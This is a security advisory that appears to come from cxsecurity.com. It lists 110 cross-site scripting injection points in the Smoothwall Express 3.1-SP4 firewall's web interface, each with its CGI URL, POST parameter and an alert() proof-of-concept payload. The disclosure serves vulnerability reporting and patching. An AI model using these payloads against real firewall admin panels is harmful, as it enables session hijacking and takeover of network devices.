Smoothwall Express 3.1-SP4-polar-x86_64-update9 Cross Site Scripting

2019.02.07
Credit: Ozer Goker
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################################################################## # Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 | Cross-Site Scripting # Date: 06.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://www.smoothwall.org # Software Link: https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download # Version: 3.1-SP4-polar-x86_64-update9 ################################################################################################################################## Introduction The Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER CACHE_SIZE PAYLOAD '><script>alert(1)</script> ################################################################################# XSS2 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MAX_SIZE PAYLOAD '><script>alert(2)</script> ################################################################################# XSS3 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MIN_SIZE PAYLOAD '><script>alert(3)</script> ################################################################################# XSS4 | Reflected URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MAX_OUTGOING_SIZE PAYLOAD '><script>alert(4)</script> ################################################################################# XSS5 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MAX_INCOMING_SIZE PAYLOAD '><script>alert(5)</script> ################################################################################# XSS6 | Stored URL http://192.168.2.200:81/cgi-bin/urlfilter.cgi METHOD Post PARAMETER REDIRECT_PAGE PAYLOAD '><script>alert(6)</script> ################################################################################# XSS7 | Reflected URL http://192.168.2.200:81/cgi-bin/urlfilter.cgi METHOD Post PARAMETER CHILDREN PAYLOAD '><script>alert(7)</script> ################################################################################# XSS8 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER BOOT_SERVER PAYLOAD '><script>alert(8)</script> ################################################################################# XSS9 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER BOOT_FILE PAYLOAD '><script>alert(9)</script> ################################################################################# XSS10 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER BOOT_ROOT PAYLOAD '><script>alert(10)</script> ################################################################################# XSS11 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER START_ADDR PAYLOAD '><script>alert(11)</script> ################################################################################# XSS12 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER END_ADDR PAYLOAD '><script>alert(12)</script> ################################################################################# XSS13 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DNS1 PAYLOAD '><script>alert(13)</script> ################################################################################# XSS14 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DNS2 PAYLOAD '><script>alert(14)</script> ################################################################################# XSS15 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NTP1 PAYLOAD '><script>alert(15)</script> ################################################################################# XSS16 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NTP2 PAYLOAD '><script>alert(16)</script> ################################################################################# XSS17 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER WINS1 PAYLOAD '><script>alert(17)</script> ################################################################################# XSS18 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER WINS2 PAYLOAD '><script>alert(18)</script> ################################################################################# XSS19 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DEFAULT_LEASE_TIME PAYLOAD '><script>alert(19)</script> ################################################################################# XSS20 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER MAX_LEASE_TIME PAYLOAD '><script>alert(20)</script> ################################################################################# XSS21 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DOMAIN_NAME PAYLOAD '><script>alert(21)</script> ################################################################################# XSS22 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NIS_DOMAIN PAYLOAD '><script>alert(22)</script> ################################################################################# XSS23 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NIS1 PAYLOAD '><script>alert(23)</script> ################################################################################# XSS24 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NIS2 PAYLOAD '><script>alert(24)</script> ################################################################################# XSS25 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_HOST PAYLOAD '><script>alert(25)</script> ################################################################################# XSS26 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_DESC PAYLOAD '><script>alert(26)</script> ################################################################################# XSS27 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_MAC PAYLOAD '><script>alert(27)</script> ################################################################################# XSS28 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_IP PAYLOAD '><script>alert(28)</script> ################################################################################# XSS29 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER HOSTNAME PAYLOAD '><script>alert(29)</script> ################################################################################# XSS30 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER DOMAIN PAYLOAD '><script>alert(30)</script> ################################################################################# XSS31 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER LOGIN PAYLOAD '"><script>alert(31)</script> ################################################################################# XSS32 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER PASSWORD PAYLOAD '><script>alert(32)</script> ################################################################################# XSS33 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '><script>alert(33)</script> ################################################################################# XSS34 | Reflected URL http://192.168.2.200:81/cgi-bin/hosts.cgi? METHOD Post PARAMETER IP PAYLOAD '"><script>alert(34)</script> ################################################################################# XSS35 | Reflected URL http://192.168.2.200:81/cgi-bin/hosts.cgi? METHOD Post PARAMETER HOSTNAME PAYLOAD '><script>alert(35)</script> ################################################################################# XSS36 | Reflected URL http://192.168.2.200:81/cgi-bin/hosts.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '><script>alert(36)</script> ################################################################################# XSS37 | Reflected URL http://192.168.2.200:81/cgi-bin/time.cgi? METHOD Post PARAMETER NTP_SERVER PAYLOAD '><script>alert(37)</script> ################################################################################# XSS38 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER BATTLEVEL PAYLOAD '><script>alert(38)</script> ################################################################################# XSS39 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER RTMIN PAYLOAD '><script>alert(39)</script> ################################################################################# XSS40 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER BATTDELAY PAYLOAD '><script>alert(40)</script> ################################################################################# XSS41 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER TO PAYLOAD '><script>alert(41)</script> ################################################################################# XSS42 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER ANNOY PAYLOAD '><script>alert(42)</script> ################################################################################# XSS43 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSIP PAYLOAD '><script>alert(43)</script> ################################################################################# XSS44 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSNAME PAYLOAD '><script>alert(44)</script> ################################################################################# XSS45 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSPORT PAYLOAD '><script>alert(45)</script> ################################################################################# XSS46 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER POLLTIME PAYLOAD '><script>alert(46)</script> ################################################################################# XSS47 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSUSER PAYLOAD '><script>alert(47)</script> ################################################################################# XSS48 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER NISPORT PAYLOAD '><script>alert(48)</script> ################################################################################# XSS49 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSAUTH PAYLOAD '><script>alert(49)</script> ################################################################################# XSS50 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER EMAIL PAYLOAD '><script>alert(50)</script> ################################################################################# XSS51 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER FROM PAYLOAD '><script>alert(51)</script> ################################################################################# XSS52 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER CC PAYLOAD '><script>alert(52)</script> ################################################################################# XSS53 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER SMSEMAIL PAYLOAD '><script>alert(53)</script> ################################################################################# XSS54 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER SMTPSERVER PAYLOAD '><script>alert(54)</script> ################################################################################# XSS55 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER PORT PAYLOAD '><script>alert(55)</script> ################################################################################# XSS56 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER USER PAYLOAD '><script>alert(56)</script> ################################################################################# XSS57 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER EMAIL_PASSWORD PAYLOAD '"><script>alert(57)</script> ################################################################################# XSS58 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER EXT PAYLOAD '><script>alert(58)</script> ################################################################################# XSS59 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER SRC_PORT_SEL PAYLOAD '><script>alert(59)</script> ################################################################################# XSS60 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER SRC_PORT PAYLOAD '><script>alert(60)</script> ################################################################################# XSS61 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER DEST_IP PAYLOAD '><script>alert(61)</script> ################################################################################# XSS62 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER DEST_PORT_SEL PAYLOAD '><script>alert(62)</script> ################################################################################# XSS63 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '><script>alert(63)</script> ################################################################################# XSS64 | Reflected URL http://192.168.2.200:81/cgi-bin/outgoing.cgi? METHOD Post PARAMETER MACHINE PAYLOAD '><script>alert(64)</script> ################################################################################# XSS65 | Reflected URL http://192.168.2.200:81/cgi-bin/outgoing.cgi? METHOD Post PARAMETER MACHINECOMMENT PAYLOAD '><script>alert(65)</script> ################################################################################# XSS66 | Reflected URL http://192.168.2.200:81/cgi-bin/dmzholes.cgi? METHOD Post PARAMETER SRC_IP PAYLOAD '><script>alert(66)</script> ################################################################################# XSS67 | Reflected URL http://192.168.2.200:81/cgi-bin/dmzholes.cgi? METHOD Post PARAMETER DEST_IP PAYLOAD '><script>alert(67)</script> ################################################################################# XSS68 | Reflected URL http://192.168.2.200:81/cgi-bin/dmzholes.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '><script>alert(68)</script> ################################################################################# XSS69 | Reflected URL http://192.168.2.200:81/cgi-bin/xtaccess.cgi? METHOD Post PARAMETER EXT PAYLOAD '><script>alert(69)</script> ################################################################################# XSS70 | Reflected URL http://192.168.2.200:81/cgi-bin/xtaccess.cgi? METHOD Post PARAMETER DEST_PORT PAYLOAD '><script>alert(70)</script> ################################################################################# XSS71 | Reflected URL http://192.168.2.200:81/cgi-bin/xtaccess.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '><script>alert(71)</script> ################################################################################# XSS72 | Reflected URL http://192.168.2.200:81/cgi-bin/ipblock.cgi? METHOD Post PARAMETER SRC_IP PAYLOAD '><script>alert(72)</script> ################################################################################# XSS73 | Reflected URL http://192.168.2.200:81/cgi-bin/ipblock.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '><script>alert(73)</script> ################################################################################# XSS74 | Reflected URL http://192.168.2.200:81/cgi-bin/timedaccess.cgi? METHOD Post PARAMETER MACHINES PAYLOAD '><script>alert(74)</script> ################################################################################# XSS75 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER GREEN_ADDRESS PAYLOAD '><script>alert(75)</script> ################################################################################# XSS76 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER GREEN_NETMASK PAYLOAD '><script>alert(76)</script> ################################################################################# XSS77 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_DHCP_HOSTNAME PAYLOAD '><script>alert(77)</script> ################################################################################# XSS78 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_ADDRESS PAYLOAD '><script>alert(78)</script> ################################################################################# XSS79 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS1_OVERRIDE PAYLOAD '><script>alert(79)</script> ################################################################################# XSS80 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS2_OVERRIDE PAYLOAD '><script>alert(80)</script> ################################################################################# XSS81 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_MAC PAYLOAD '><script>alert(81)</script> ################################################################################# XSS82 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_NETMASK PAYLOAD '><script>alert(82)</script> ################################################################################# XSS83 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DEFAULT_GATEWAY PAYLOAD '><script>alert(83)</script> ################################################################################# XSS84 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS1 PAYLOAD '><script>alert(84)</script> ################################################################################# XSS85 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS2 PAYLOAD '><script>alert(85)</script> ################################################################################# XSS86 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER NAME PAYLOAD '><script>alert(86)</script> ################################################################################# XSS87 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER LEFT PAYLOAD '><script>alert(87)</script> ################################################################################# XSS88 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER LEFT_SUBNET PAYLOAD '><script>alert(88)</script> ################################################################################# XSS89 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER RIGHT PAYLOAD '><script>alert(89)</script> ################################################################################# XSS90 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER RIGHT_SUBNET PAYLOAD '><script>alert(90)</script> ################################################################################# XSS91 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER SECRET1 PAYLOAD '><script>alert(91)</script> ################################################################################# XSS92 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER SECRET2 PAYLOAD '><script>alert(92)</script> ################################################################################# XSS93 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '><script>alert(93)</script> ################################################################################# XSS94 | Stored URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER filename PAYLOAD <script>alert(94)</script> ################################################################################# XSS95 | Reflected URL http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat METHOD Post PARAMETER SOURCE_IP PAYLOAD "><script>alert(95)</script> ################################################################################# XSS96 | Stored URL http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat METHOD Post PARAMETER FILTER PAYLOAD '><script>alert(96)</script> ################################################################################# XSS97 | Reflected URL http://192.168.2.200:81/cgi-bin/ipinfo.cgi? METHOD Post PARAMETER IP PAYLOAD '><script>alert(97)</script> ################################################################################# XSS98 | Reflected URL http://192.168.2.200:81/cgi-bin/iptools.cgi? METHOD Post PARAMETER IP PAYLOAD '><script>alert(98)</script> ################################################################################# XSS99 | Reflected URL http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? METHOD Post PARAMETER WRAP PAYLOAD '><script>alert(99)</script> ################################################################################# XSS100 | Reflected URL http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? METHOD Post PARAMETER SECTIONTITLE PAYLOAD '><script>alert(100)</script> ################################################################################# XSS101 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER INIT PAYLOAD '><script>alert(101)</script> ################################################################################# XSS102 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER HANGUP PAYLOAD '><script>alert(102)</script> ################################################################################# XSS103 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER SPEAKER_ON PAYLOAD '><script>alert(103)</script> ################################################################################# XSS104 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER SPEAKER_OFF PAYLOAD '><script>alert(104)</script> ################################################################################# XSS105 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER TONE_DIAL PAYLOAD '><script>alert(105)</script> ################################################################################# XSS106 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER PULSE_DIAL PAYLOAD '><script>alert(106)</script> ################################################################################# XSS107 | Reflected URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER TIMEOUT PAYLOAD '><script>alert(107)</script> ################################################################################# XSS108 | Stored URL http://192.168.2.200:81/cgi-bin/preferences.cgi? METHOD Post PARAMETER HOSTNAME PAYLOAD '><script>alert(108)</script> ################################################################################# XSS109 | Stored URL http://192.168.2.200:81/cgi-bin/preferences.cgi? METHOD Post PARAMETER KEYMAP PAYLOAD '><script>alert(109)</script> ################################################################################# XSS110 | Stored URL http://192.168.2.200:81/cgi-bin/preferences.cgi? METHOD Post PARAMETER OPENNESS PAYLOAD '><script>alert(110)</script> #################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top